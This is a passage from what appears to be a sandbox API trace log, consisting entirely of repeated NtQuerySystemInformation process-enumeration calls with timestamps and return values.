ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.722] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x152b8) returned 0x0 [0176.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15238) returned 0x0 [0176.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.863] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.896] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x15010) returned 0x0 [0176.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 [0176.986] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x32358f0, ResultLength=0x53ff7ec*=0x14f00) returned 0x0 